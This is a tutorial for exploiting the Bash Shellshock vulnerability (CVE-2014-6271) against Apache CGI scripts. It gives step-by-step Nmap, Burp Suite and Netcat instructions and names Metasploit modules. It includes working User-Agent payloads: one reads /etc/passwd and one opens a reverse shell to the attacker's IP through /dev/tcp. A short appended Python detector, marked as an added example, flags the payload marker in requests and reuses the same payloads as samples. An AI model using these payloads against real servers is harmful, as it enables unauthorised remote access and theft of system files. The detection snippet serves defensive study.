🐚 Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

CVE-2014-6271 - Shellshock

  • Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (since V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

  • The Shellshock vulnerability was discovered by Stéphane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.

  • Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.

  • The Shellshock vulnerability is caused by a bug in how Bash imports function definitions from environment variables: Bash mistakenly keeps parsing past the end of the definition and executes any trailing commands that follow the characters () { :; };.

  • This vulnerability only affects Linux, as Windows does not utilize Bash and is not a *Nix based operating system.

  • In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

  • CGI (Common Gateway Interface) scripts are executed by Apache as separate processes on the Linux system, after which their output is returned to the client.

Shellshock Exploitation

  • In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.

  • In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.

  • Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.

  • This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.

Attack Flow for Exploiting Shellshock Vulnerability

1. Identify the Target

Objective: Verify if the target system is running an Apache server.

Tool: Nmap

Command:

nmap -sV <target_ip>

Explanation: This command scans the target IP to identify open ports and services. Look for Apache in the service list.

2. Find the CGI Script

Objective: Determine the path of the CGI script that runs on the server.

Action: Access the web application and examine the page source for the CGI script path.

Explanation: Look for a .cgi or .pl file in the source code. This is the script that you will target for the Shellshock exploit.

3. Check for Shellshock Vulnerability

Objective: Test if the CGI script is vulnerable to the Shellshock exploit.

Action: Use the Nmap script to check for Shellshock vulnerability.

nmap -sV <target_ip> --script=http-shellshock --script-args "http-shellshock.uri=<cgi_file_path>"

Explanation: This command uses the http-shellshock script to test the specified CGI script for the Shellshock vulnerability.

4. Set Up Burp Suite

Objective: Intercept and modify the HTTP request to exploit Shellshock.

Action: Configure Burp Suite to act as a proxy for your browser.

Explanation: This will allow you to capture and manipulate HTTP requests to the server.

5. Intercept the Request

Objective: Modify the HTTP request to include the Shellshock payload.

Action: Use Burp Suite’s Repeater tool to forward the captured request.

Payload for Checking Vulnerability:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Explanation: This payload checks if the server is vulnerable by attempting to execute a command to read the /etc/passwd file.

6. Exploit Shellshock for Reverse Shell

Objective: Gain a reverse shell on the target server.

Action: Use the following payload to create a reverse shell.

Payload for Reverse Shell:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'

Explanation: This payload initiates a reverse shell connection from the target server to your machine.

7. Set Up a Listener

Objective: Prepare your system to receive the reverse shell connection.

Action: Run a Netcat listener on your machine.

nc -nvlp 1234

Explanation: This command listens for incoming connections on port 1234. Adjust the port number if needed.

8. Send the Exploit Request

Objective: Trigger the Shellshock exploit to establish the reverse shell.

Action: Send the modified HTTP request with the reverse shell payload through Burp Suite.

Explanation: Once sent, the target server will connect back to your Netcat listener, providing you with a reverse shell.
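As an added example (not part of the original page): a small Python check that reproduces the CGI header-to-environment mapping behind the bullets above (User-Agent becomes HTTP_USER_AGENT, which is how a request header ends up in Bash's environment at all) and flags requests whose header values begin with the () { marker, the same match a WAF or IDS rule uses to block the probe and reverse-shell payloads from steps 5 and 6. The request samples are constructed; example.test and the CGI path are placeholders.

```python
import re

# Shellshock marker: a value that begins with an empty Bash function
# definition "() {". Vulnerable Bash imported any such environment variable
# as a function and kept parsing past the closing "};", running whatever
# followed. Whitespace is optional in the bug, so the pattern tolerates it.
SHELLSHOCK_MARKER = re.compile(r"^\s*\(\s*\)\s*\{")


def parse_request_headers(raw_request):
    """Split a raw HTTP request (as seen in a proxy or IDS) into a dict of
    header name -> value; the request line and any body are ignored."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return headers


def cgi_meta_variables(headers):
    """Reproduce the RFC 3875 mapping User-Agent -> HTTP_USER_AGENT. This is
    why an attacker-controlled header reaches Bash's environment when
    Apache runs a CGI script written in (or spawning) Bash."""
    return {"HTTP_" + n.upper().replace("-", "_"): v for n, v in headers.items()}


def find_shellshock_vars(env):
    """Return the environment variable names whose values carry the marker;
    a WAF or IDS rule should reject the request when this is non-empty."""
    return sorted(n for n, v in env.items() if SHELLSHOCK_MARKER.match(v))


def is_shellshock_request(raw_request):
    """Request-level verdict, usable in a reverse proxy or for log replay."""
    env = cgi_meta_variables(parse_request_headers(raw_request))
    return bool(find_shellshock_vars(env))


# Constructed samples: the probe payload from step 5 in User-Agent, and a
# benign browser request to the same (placeholder) CGI path.
PROBE_REQUEST = (
    "GET /cgi-bin/status.cgi HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET /cgi-bin/status.cgi HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"
)
```

The same marker check applies to any header Apache exports (Cookie, Referer, Host), not only User-Agent, so the detector works on the whole mapped environment rather than a single header.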

Worth Noting

It's worth noting that this vulnerability can also be exploited using the Metasploit framework. There are two modules available:

  1. auxiliary/scanner/http/apache_mod_cgi_bash_env: This module checks for the presence of CGI scripts and whether the server is vulnerable to the Shellshock exploit.

  2. exploit/multi/http/apache_mod_cgi_bash_env_exec: This module exploits the Shellshock vulnerability to gain a reverse shell using Meterpreter.
